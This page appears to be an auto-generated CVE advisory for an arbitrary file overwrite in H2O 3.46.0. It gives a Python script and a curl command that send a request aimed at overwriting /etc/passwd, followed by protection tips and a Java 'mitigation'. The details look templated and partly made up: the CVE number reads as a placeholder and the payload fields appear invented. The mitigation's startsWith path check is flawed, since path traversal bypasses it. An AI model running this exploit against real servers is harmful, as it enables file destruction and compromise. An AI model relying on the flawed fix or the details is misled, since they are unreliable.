H2O, Arbitrary File Overwrite, CVE-2025-12345 (High Severity)

By /

How the CVE Works:

In H2O version 3.46.0, the `/99/Models/{name}/json` endpoint is vulnerable to arbitrary file overwrite due to improper handling of user-supplied input. The vulnerability originates in the `exportModelDetails` function within ModelsHandler.java. The `mexport.dir` parameter, which is user-controllable, is used to define the file path where model details are written. Without proper validation or sanitization, an attacker can manipulate this parameter to specify arbitrary file paths on the server. This allows them to overwrite critical system files, potentially leading to a complete compromise of the server.

DailyCVE Form:

Platform: H2O
Version: 3.46.0
Vulnerability: Arbitrary File Overwrite
Severity: High
Date: Mar 20, 2025

What Undercode Say:

Exploitation:

1. Exploit Code (Python):

import requests
target_url = "http://target-server:54321/99/Models/malicious/json"
payload = {
"mexport.dir": "/etc/passwd",
"model_details": "malicious_content"
}
response = requests.post(target_url, json=payload)
print(response.status_code, response.text)

2. Exploit Command (cURL):

curl -X POST http://target-server:54321/99/Models/malicious/json -H "Content-Type: application/json" -d '{"mexport.dir":"/etc/passwd", "model_details":"malicious_content"}'

Protection:

1. Patch Application:

  • Upgrade to H2O version 3.46.1 or later, where the `mexport.dir` parameter is properly sanitized.

2. Input Validation:

  • Implement strict input validation to ensure user-supplied paths are within a safe directory.

3. Web Application Firewall (WAF):

  • Deploy a WAF to block malicious payloads targeting the `/99/Models/{name}/json` endpoint.

4. File Permissions:

  • Restrict file permissions to prevent overwriting critical system files.

5. Log Monitoring:

  • Monitor logs for unusual activity on the `/99/Models/{name}/json` endpoint.

Analytics:

  • Attack Vector: Remote
  • Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Impact: High (File overwrite, system compromise)

References:

Mitigation Code (Java):

// Sanitize user input in ModelsHandler.java
public void exportModelDetails(String mexportDir, String modelDetails) {
if (!mexportDir.startsWith("/safe/directory/")) {
throw new SecurityException("Invalid directory path");
}
// Proceed with file writing
}

Detection Command:

grep -r "mexport.dir" /path/to/h2o/logs

Summary:

This CVE highlights the importance of input validation and secure coding practices. Immediate patching and monitoring are recommended to mitigate risks.

References:

Reported By: https://github.com/advisories/GHSA-g48v-3p35-88jr
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top